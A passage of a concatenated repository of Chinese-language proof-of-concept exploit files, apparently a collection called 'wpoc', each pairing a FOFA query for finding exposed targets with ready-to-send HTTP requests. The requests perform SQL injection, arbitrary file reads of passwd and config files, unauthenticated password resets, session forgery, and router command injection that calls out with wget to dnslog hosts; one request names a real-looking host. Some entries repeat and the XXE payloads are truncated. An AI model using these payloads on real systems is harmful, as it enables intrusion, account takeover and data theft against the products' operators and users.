12 | User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
13 | Accept-Charset: utf-8
14 | Accept-Encoding: gzip, deflate
15 | Connection: close
16 |
17 | ```
18 |
--------------------------------------------------------------------------------
/wpoc/网康科技/网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 网康科技NS-ASG应用安全网关config_ISCGroupNoCache.php存在SQL注入漏洞
2 |
3 | ## fofa
4 | ```
5 | app="网康科技-NS-ASG安全网关"
6 | ```
7 |
8 | ## poc
9 | ```
10 | GET /admin/config_ISCGroupNoCache.php?GroupId=1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e)) HTTP/1.1
11 | Host:
12 | User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
13 | Accept-Charset: utf-8
14 | Accept-Encoding: gzip, deflate
15 | Connection: close
16 |
17 | ```
18 |
--------------------------------------------------------------------------------
/wpoc/网康科技/网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md:
--------------------------------------------------------------------------------
1 | ## 网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022)
2 |
3 |
4 | ## poc
5 | ```
6 | /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e))
7 | ```
8 |
--------------------------------------------------------------------------------
/wpoc/网御星云/网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞
2 |
3 | 网御 ACM上网行为管理系统 bottomframe.cgi 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感信息
4 |
5 | ## fofa
6 |
7 | ```
8 | app="网御星云-上网行为管理系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
15 | ```
16 |
17 | 
18 |
--------------------------------------------------------------------------------
/wpoc/网神/某神SecSSL3600安全接入网关系统任意密码修改漏洞.md:
--------------------------------------------------------------------------------
1 | ## 某神SecSSL3600安全接入网关系统任意密码修改漏洞
2 |
3 | 网神 SecSSL 3600安全接入网关系统 存在未授权访问漏洞,攻击者通过漏洞可以获取用户列表,并修改用户账号密码
4 |
5 | ## fofa
6 |
7 | ```
8 | app="安全接入网关SecSSLVPN"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | POST /changepass.php?type=2 HTTP/1.1
15 | host:
16 | Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}
17 |
18 | old_pass=&password=Test123!@&repassword=Test123!@
19 | ```
20 |
21 | 
22 |
--------------------------------------------------------------------------------
/wpoc/群杰印章物联网管理平台/群杰印章物联网管理平台rest密码重置漏洞(XVE-2024-18945).md:
--------------------------------------------------------------------------------
1 | # 群杰印章物联网管理平台rest密码重置漏洞(XVE-2024-18945)
2 |
3 | 群杰印章物联网管理平台是由江苏群杰物联科技有限公司开发的智能印章管理解决方案。该平台利用物联网技术,提供印章全生命周期管理,涵盖印章的申请、领用、归还、销毁等各个环节。 群杰印章物联网管理平台存在rest账户密码重置漏洞,攻击者可利用该漏洞重置rest账户密码。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | "群杰印章物联网平台"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /api/token/updateRestUser?restname=rest&password=123456 HTTP/1.1
15 | Host:
16 |
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/致远OA/致远M3敏感信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ## 致远M3敏感信息泄露漏洞
2 |
3 |
4 | ## fofa
5 | ```
6 | title="M3-Server"
7 | ```
8 |
9 | ## poc
10 | ```
11 | GET /mobile_portal/logs/autoLogin.log HTTP/1.1
12 | Host: x.x.x.x
13 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
14 | Accept-Charset: utf-8
15 | Accept-Encoding: gzip, deflate
16 | Connection: close
17 | ```
18 |
19 | 
20 |
--------------------------------------------------------------------------------
/wpoc/致远OA/致远OA wpsAssistServlet任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 致远OA wpsAssistServlet任意文件读取漏洞
2 |
3 | ## POC
4 | ```
5 | POST /seeyon/wpsAssistServlet HTTP/1.1
6 | Host: 127.0.0.1
7 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
8 | Accept: */*
9 | Connection: Keep-Alive
10 | Content-Length: 47
11 | Content-Type: application/x-www-form-urlencoded
12 |
13 | flag=template&templateUrl=C:/windows/system.ini
14 | ```
15 |
--------------------------------------------------------------------------------
/wpoc/致远OA/致远OA-wpsAssistServlet任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 致远OA wpsAssistServlet任意文件读取漏洞
2 |
3 | ## POC
4 | ```
5 | POST /seeyon/wpsAssistServlet HTTP/1.1
6 | Host: 127.0.0.1
7 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
8 | Accept: */*
9 | Connection: Keep-Alive
10 | Content-Length: 47
11 | Content-Type: application/x-www-form-urlencoded
12 |
13 | flag=template&templateUrl=C:/windows/system.ini
14 | ```
15 |
--------------------------------------------------------------------------------
/wpoc/致远OA/致远OAV52019系统properties信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ## 致远OAV52019系统properties信息泄露漏洞
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```
8 | app="致远互联-OA"
9 | ```
10 |
11 |
12 |
13 | ## poc
14 |
15 | ```
16 | GET /seeyon/rest/m3/common/system/properties HTTP/1.1
17 | Host: your-ip
18 |
19 |
20 | ```
21 |
22 | 
--------------------------------------------------------------------------------
/wpoc/致远OA/致远OA前台任意用户密码修改漏洞.md:
--------------------------------------------------------------------------------
1 | # 致远OA前台任意用户密码修改漏洞
2 |
3 | ## 版本
4 | ```
5 | Seeyon OA=V5/G6
6 | Seeyon OA=V8.1SP2
7 | Seeyon OA=V8.2
8 | ```
9 | ## exp
10 | ```
11 | POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
12 | Host: ip
13 | User-Agent: Go-http-client/1.1
14 | Content-Length: 24
15 | Content-Type: application/json
16 | Accept-Encoding: gzip
17 |
18 | {"loginName":"admin","password":"123456"}
19 | ```
20 |
--------------------------------------------------------------------------------
/wpoc/致远OA/致远OA帆软组件ReportServer目录遍历漏洞.md:
--------------------------------------------------------------------------------
1 | ## 致远OA帆软组件ReportServer目录遍历漏洞
2 |
3 | 致远OA 帆软组件 ReportServer接口存在目录遍历漏洞,攻击者通过漏洞可以获取服务器敏感信息
4 |
5 | ## fofa
6 |
7 | ```
8 | title="致远A8-V5协同管理软件 V6.1sp1"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | /seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../¤tUserName=admin¤tUserId=1&isWebReport=true
15 | ```
16 |
17 | 
--------------------------------------------------------------------------------
/wpoc/致远OA/致远互联FE协作办公平台apprvaddNew存在sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 致远互联FE协作办公平台apprvaddNew存在sql注入漏洞
2 |
3 | ## fofa
4 |
5 | ```java
6 | title="FE协作办公平台" || body="li_plugins_download"
7 | ```
8 |
9 | ## poc
10 |
11 | ```java
12 | POST /witapprovemanage/apprvaddNew.j%73p HTTP/1.1
13 | Host:
14 | User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36
15 | Content-Type:application/x-www-form-urlencoded
16 |
17 | flowid=1';WAITFOR+DELAY+'0:0:5'--+---
18 | ```
19 |
20 | 
--------------------------------------------------------------------------------
/wpoc/致远OA/致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 致远互联FE协作办公平台codeMoreWidget.js存在sql注入漏洞
2 |
3 | ## fofa
4 |
5 | ```
6 | title="FE协作办公平台" || body="li_plugins_download"
7 | ```
8 |
9 | ## poc
10 |
11 | ```
12 | POST /common/codeMoreWidget.js%70 HTTP/1.1
13 | Host:
14 | User-Agent: Mozilla/5.0
15 | Content-Type: application/x-www-form-urlencoded
16 | Content-Length: 32
17 |
18 | code=-1';waitfor delay '0:0:5'--
19 | ```
20 |
21 |
--------------------------------------------------------------------------------
/wpoc/致远OA/致远互联FE协作办公平台editflow_manager存在sql注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 致远互联FE协作办公平台editflow_manager存在sql注入漏洞
2 |
3 | ## fofa
4 | ```
5 | title="FE协作办公平台" || body="li_plugins_download"
6 | ```
7 |
8 |
9 | ## poc
10 | ```
11 | POST /sysform/003/editflow_manager.js%70 HTTP/1.1
12 | Host: x.x.x.x
13 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
14 | Connection: close
15 | Content-Length: 41
16 | Content-Type: application/x-www-form-urlencoded
17 | Accept-Encoding: gzip
18 |
19 | option=2&GUID=-1'+union+select+111*222--+
20 | ```
21 | 响应结果中包含24642证明存在漏洞
22 |
23 |
--------------------------------------------------------------------------------
/wpoc/致远OA/致远互联FE协作办公平台ncsubjass存在SQL注入.md:
--------------------------------------------------------------------------------
1 | ## 致远互联FE协作办公平台ncsubjass存在SQL注入
2 |
3 | 致远互联FE协作办公平台ncsubjass.jsp存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息。
4 |
5 | ## fofa
6 |
7 | ```
8 | body="li_plugins_download"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | POST /fenc/ncsubjass.j%73p HTTP/1.1
15 | Host: your-ip
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
17 | Content-Type: application/x-www-form-urlencoded
18 |
19 | subjcode=';WAITFOR DELAY '0:0:5'--
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/菠菜/万豪娱乐存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 万豪娱乐存在任意文件读取漏洞
2 |
3 | 万豪娱乐存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | "Public/Js/Mobile" && country="CN"
9 | ```
10 |
11 | 
12 |
13 | ## poc
14 |
15 | ```javascript
16 | /Home/game/getimg?url=php://filter/read=convert.base64-encode/resource=Application/Common/Conf/config.php&id=1993
17 | ```
18 |
19 | **使用poc访问后,接着访问 /public/gamelist/1993.jpg 的图片,保存下来就是读取到的内容**
20 |
21 |
--------------------------------------------------------------------------------
/wpoc/蓝凌OA/某凌OA前台代码执行.md:
--------------------------------------------------------------------------------
1 | ## 某凌OA前台代码执行
2 | ```
3 | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
4 | Host: www.ynjd.cn:801
5 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
6 | Accept: /
7 | Connection: Keep-Alive
8 | Content-Length: 42
9 | Content-Type: application/x-www-form-urlencoded
10 |
11 | var={"body":{"file":"file:///etc/passwd"}}
12 | ```
13 | var={"body":{"file":"file:///etc/passwd"}} // linux
14 |
15 |
16 | var={"body":{"file":"/WEB-INF/KnssConfig/admin.properties"}} //windows
17 |
--------------------------------------------------------------------------------
/wpoc/蓝凌OA/蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181).md:
--------------------------------------------------------------------------------
1 | # 蓝凌EIS智慧协同平台UniformEntry.aspx存在SQL注入漏洞(XVE-2024-19181)
2 |
3 | 蓝凌EIS智慧协同平台是一款专为成长型企业打造的智慧办公云平台,深度融合了阿里钉钉的功能。该平台旨在通过增强组织的协同在线、业务在线和生态在线,提升企业的工作效率和管理便捷性。 蓝凌EIS智慧协同平台存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感数据。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | icon_hash="953405444"||app="Landray-OA系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | GET /third/DingTalk/Pages/UniformEntry.aspx?moduleid=1;WAITFOR+DELAY+'0:0:5'-- + HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/蓝海卓越/蓝海卓越计费管理系统存在弱口令漏洞.md:
--------------------------------------------------------------------------------
1 | # 蓝海卓越计费管理系统存在弱口令漏洞
2 |
3 | # 一、漏洞简介
4 | 蓝海卓越计费管理系统存在弱口令漏洞
5 |
6 | # 二、影响版本
7 | + 蓝海卓越计费管理系统
8 |
9 | # 三、资产测绘
10 | + fofa`title=="蓝海卓越计费管理系统"`
11 | + 特征
12 |
13 | 
14 |
15 | # 四、漏洞复现
16 | ```plain
17 | admin/admin
18 | ```
19 |
20 | 
21 |
22 |
23 |
24 | > 更新: 2024-05-23 12:33:24
25 | > 原文:
--------------------------------------------------------------------------------
/wpoc/蜂信物联/蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞.md:
--------------------------------------------------------------------------------
1 | # 蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞
2 |
3 | 蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | "fastbee"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
15 | Host:
16 | Accept-Encoding: gzip, deflate, br
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/西软云/西软云XMS-futurehotel-operate接口存在XXE漏洞.md:
--------------------------------------------------------------------------------
1 | ## 西软云XMS-futurehotel-operate接口存在XXE漏洞
2 |
3 | ## fofa
4 | ```
5 | app="shiji-西软云XMS"
6 | ```
7 |
8 | ## poc
9 | ```
10 | POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
11 | Host: your-ip
12 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36
13 | Connection: close
14 | Content-Type: text/xml
15 | Accept-Encoding: gzip
16 |
17 | %remote;]>
18 | ```
19 |
--------------------------------------------------------------------------------
/wpoc/西软云/西软云XMS-futurehotel-query接口存在XXE漏洞.md:
--------------------------------------------------------------------------------
1 | ## 西软云XMS-futurehotel-query接口存在XXE漏洞
2 |
3 | ## fofa
4 | ```
5 | app="shiji-西软云XMS"
6 | ```
7 |
8 | ## poc
9 | ```
10 | POST /XopServerRS/rest/futurehotel/query HTTP/1.1
11 | Host: your-ip
12 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36
13 | Connection: close
14 | Content-Type: text/xml
15 | Accept-Encoding: gzip
16 |
17 | %remote;]>
18 | ```
19 |
--------------------------------------------------------------------------------
/wpoc/要塞T3管理系统/要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞
2 |
3 | 要塞T3系统接口Ajax_CheckMobileRepeat存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="/mlogin.htm?url=" || body="T3/MAIN/Login.aspx"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | http://ip/T3/Ajax/Ajax_CheckMobileRepeat.ashx?action=checkmobilerepeat&mobileNum=1%27%20UNION%20ALL%20SELECT%20NULL%2C%28SELECT%20%40%40version%29--%20aEdt
15 | ```
16 | 
17 |
--------------------------------------------------------------------------------
/wpoc/赛蓝企业管理系统/赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞.md:
--------------------------------------------------------------------------------
1 | # 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞
2 |
3 | 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞,该漏洞可直接登录后台。
4 |
5 | ## fofa
6 |
7 | ```java
8 | body="www.cailsoft.com" || body="赛蓝企业管理系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f HTTP/1.1
15 | Host:
16 | ```
17 |
18 | 
19 |
20 | 
--------------------------------------------------------------------------------
/wpoc/赛蓝企业管理系统/赛蓝企业管理系统GetCssFile存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 赛蓝企业管理系统GetCssFile存在任意文件读取漏洞
2 |
3 | 赛蓝企业管理系统 GetCssFile接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
4 |
5 | ## fofa
6 |
7 | ```java
8 | body="www.cailsoft.com" || body="赛蓝企业管理系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /Utility/GetCssFile?filePath=../web.config HTTP/1.1
15 | Host: ip
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/赛蓝企业管理系统/赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # 赛蓝企业管理系统GetImportDetailJson存在SQL注入漏洞
2 |
3 | 赛蓝企业管理系统 **GetImportDetailJson**接口处SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="www.cailsoft.com" || body="赛蓝企业管理系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /BaseModule/ExcelImport/GetImportDetailJson?ImportId=1%27%3bWAITFOR+DELAY+%270%3a0%3a5%27--&IsShow=1 HTTP/1.1
15 | Host: {{Hostname}}
16 | ```
17 |
18 |
--------------------------------------------------------------------------------
/wpoc/赛蓝企业管理系统/赛蓝企业管理系统GetJSFile存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # 赛蓝企业管理系统GetJSFile存在任意文件读取漏洞
2 |
3 | 赛蓝企业管理系统 GetJSFile 接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
4 |
5 | ## fofa
6 |
7 | ```java
8 | body="www.cailsoft.com" || body="赛蓝企业管理系统"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
17 | Accept: */*
18 | Accept-Encoding: gzip, deflate, br
19 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
20 | Connection: close
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/wpoc/路由器/Netgear路由器boardDataWW.php存在RCE漏洞.md:
--------------------------------------------------------------------------------
1 | ## Netgear路由器boardDataWW.php存在RCE漏洞
2 |
3 | NetGear是一家知名的网络设备制造商,其路由器产品线多样化,性能稳定,易用性强,安全性高,并提供良好的技术支持和售后服务。适合家庭和企业用户使用,是可靠的网络设备品牌选择。
4 | 该产品boardDataWW.php处存在RCE漏洞,恶意攻击者可能会利用此漏洞执行恶意命令,最终导致服务器失陷。
5 |
6 | ## fofa
7 | ```
8 | title=="Netgear"
9 | ```
10 |
11 |
12 | ## poc
13 | ```
14 | POST /boardDataWW.php HTTP/1.1
15 | Host:
16 | Accept: */*
17 | Content-Type: application/x-www-form-urlencoded
18 |
19 | macAddress=112233445566%3Bwget+http%3A%2F%2Fnstucl.dnslog.cn%23®info=0&writeData=Submit
20 | ```
21 |
--------------------------------------------------------------------------------
/wpoc/路由器/Telesquare路由器RCE(CVE-2024-29269).md:
--------------------------------------------------------------------------------
1 | ## Telesquare路由器RCE(CVE-2024-29269)
2 |
3 | ## fofa
4 | ```
5 | title="Login to TLR-2005KSH"
6 | app="TELESQUARE-TLR-2005KSH"
7 | ```
8 |
9 | ## poc
10 | ```
11 | GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
12 | Host: x.x.x.x:8085
13 |
14 | ```
15 |
16 | 
17 |
--------------------------------------------------------------------------------
/wpoc/路由器/draytek路由器addrouting命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ## draytek路由器addrouting命令执行漏洞
2 |
3 | ## fofa
4 | ```
5 | header="realm="VigorAP910C"
6 | ```
7 |
8 |
9 | ## poc
10 | ```
11 | 获取token
12 | GET /opmode.asp HTTP/1.1
13 | Host:
14 | Authorization: Basic YWRtaW46YWRtaW4=
15 | Referer:{{Hostname}}
16 | ser-Agent: Mozilla/5.0 - |
17 |
18 | 执行命令
19 | GET /goform/addRouting?AuthStr={{token}}&dest=||+echo+$(+{{rce}})%3b%23a HTTP/1.1
20 | Host:
21 | Authorization: Basic YWRtaW46YWRtaW4= R
22 | eferer:{{Hostname}}
23 | User-Agent: Mozilla/5.0
24 | ```
25 |
--------------------------------------------------------------------------------
/wpoc/路由器/中移铁通禹路由器信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ## 中移铁通禹路由器信息泄露漏洞
2 |
3 | ## fofa
4 | ```
5 | title="互联世界 物联未来-登录"
6 | ```
7 |
8 | ## poc
9 | ```
10 | /cgi-bin/ExportSettings.sh
11 | ```
12 |
13 | 
14 |
15 | 
16 |
--------------------------------------------------------------------------------
/wpoc/路由器/极企智能办公路由接口jumper.php存在RCE漏洞.md:
--------------------------------------------------------------------------------
1 | ## 极企智能办公路由接口jumper.php存在RCE漏洞
2 |
3 | 极企智能办公路由接口jumper.php存在命令执行漏洞,导致服务器权限沦陷。
4 |
5 | ## fofa
6 |
7 | ```
8 | app="GEEQEE-极企智能办公路由"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /notice/jumper.php?t=;wget%20http://xxx.dnslog.cn HTTP/1.1
15 | Host:
16 | Connection: keep-alive
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/辰信景云终端安全管理系统/某信景云终端安全管理系统存在loginSQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 某信景云终端安全管理系统 login SQL注入漏洞
2 | ```
3 | POST /api/user/login
4 |
5 | captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='
6 | ```
7 |
--------------------------------------------------------------------------------
/wpoc/远秋医学培训系统/远秋医学培训系统未授权查看密码.md:
--------------------------------------------------------------------------------
1 | ## 远秋医学培训系统未授权查看密码
2 |
3 | ## fofa
4 | ```
5 | title="远秋医学培训报名系统v1.0"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://127.0.0.1:9042/User/ManagerList.aspx?ty=1&ty=1
11 | ```
12 | 
13 |
14 | 
15 |
--------------------------------------------------------------------------------
/wpoc/通天星/通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744).md:
--------------------------------------------------------------------------------
1 | ## 通天星CMSV6车载定位监控平台SQL注入漏洞(XVE-2023-23744)
2 |
3 |
4 |
5 | ## fofa
6 |
7 | ```
8 | ody="/808gps/"
9 | ```
10 |
11 |
12 |
13 | ## poc
14 |
15 | ```
16 | GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
17 | Host: your-ip
18 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
19 | Accept: */*
20 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
21 | Accept-Encoding: gzip, deflate
22 | Connection: close
23 | ```
24 |
25 |
--------------------------------------------------------------------------------
/wpoc/通天星/通天星CMSV6车载视频监控平台SESSION伪造漏洞.md:
--------------------------------------------------------------------------------
1 | # 通天星CMSV6车载视频监控平台SESSION伪造漏洞
2 |
3 | 通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。其存在SESSION伪造漏洞,恶意攻击者利用此漏洞登录系统后台。
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="/808gps"
9 | ```
10 |
11 | ## poc
12 |
13 | ```yaml
14 | POST /808gps/LocationManagement/UserSessionAction_saveUserSession.action HTTP/1.1
15 | Host:
16 | User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:103.0)Gecko/20100101Firefox/103.0
17 | Content-Type: application/x-www-form-urlencoded
18 |
19 | userSession=42AA7A2BE767123A42E1530ACC920781&id=4
20 | ```
21 |
22 |
--------------------------------------------------------------------------------
/wpoc/通天星/通天星CMSV6车载视频监控平台downloadLogger接口任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 通天星CMSV6车载视频监控平台downloadLogger接口任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | body="./open/webApi.html"||body="/808gps/"
6 | ```
7 |
8 |
9 | ## poc
10 | ```
11 | GET /808gps/logger/downloadLogger.action?fileName=C://Windows//win.ini HTTP/1.1
12 | Host:127.0.0.1
13 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
14 | Accept: */*
15 | Connection: Keep-Alive
16 | ```
17 |
18 | 
19 |
--------------------------------------------------------------------------------
/wpoc/通天星/通天星CMSV6车载视频监控平台xz_center信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ## 通天星CMSV6车载视频监控平台xz_center信息泄露漏洞
2 |
3 |
4 |
5 |
6 | ## poc
7 |
8 | ```
9 | POST /xz_center/list HTTP/1.1
10 | Host: {{Hostname}}
11 | User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
12 | Accept: */*
13 | Accept-Encoding: gzip, deflate
14 | Connection: close
15 |
16 | page=1
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/wpoc/通天星/鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | body="./open/webApi.html"||body="/808gps/"
6 | ```
7 |
8 | ## poc
9 | ```
10 | GET /808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100 HTTP/1.1
11 | Host:127.0.0.1
12 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
13 | Accept: */*
14 | Connection: Keep-Alive
15 | ```
16 |
17 | 
18 |
--------------------------------------------------------------------------------
/wpoc/通达OA/通达OA down.php接口存在未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 |
2 | ## 通达OA down.php接口存在未授权访问漏洞
3 |
4 | ## fofa
5 | ```
6 | app="TDXK-通达OA"
7 | ```
8 |
9 | ## poc
10 |
11 | ```
12 | http://127.0.0.1/inc/package/down.php?id=../../../cache/org
13 |
14 | GET /inc/package/down.php?id=../../../cache/org HTTP/1.1
15 | Host: 127.0.0.1
16 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
17 | Accept: */*
18 | Connection: Keep-Alive
19 | ```
20 |
21 | 
22 |
--------------------------------------------------------------------------------
/wpoc/通达OA/通达OA-down.php接口存在未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 |
2 | ## 通达OA down.php接口存在未授权访问漏洞
3 |
4 | ## fofa
5 | ```
6 | app="TDXK-通达OA"
7 | ```
8 |
9 | ## poc
10 |
11 | ```
12 | http://127.0.0.1/inc/package/down.php?id=../../../cache/org
13 |
14 | GET /inc/package/down.php?id=../../../cache/org HTTP/1.1
15 | Host: 127.0.0.1
16 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
17 | Accept: */*
18 | Connection: Keep-Alive
19 | ```
20 |
--------------------------------------------------------------------------------
/wpoc/通达OA/通达OAV11.10接口login.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
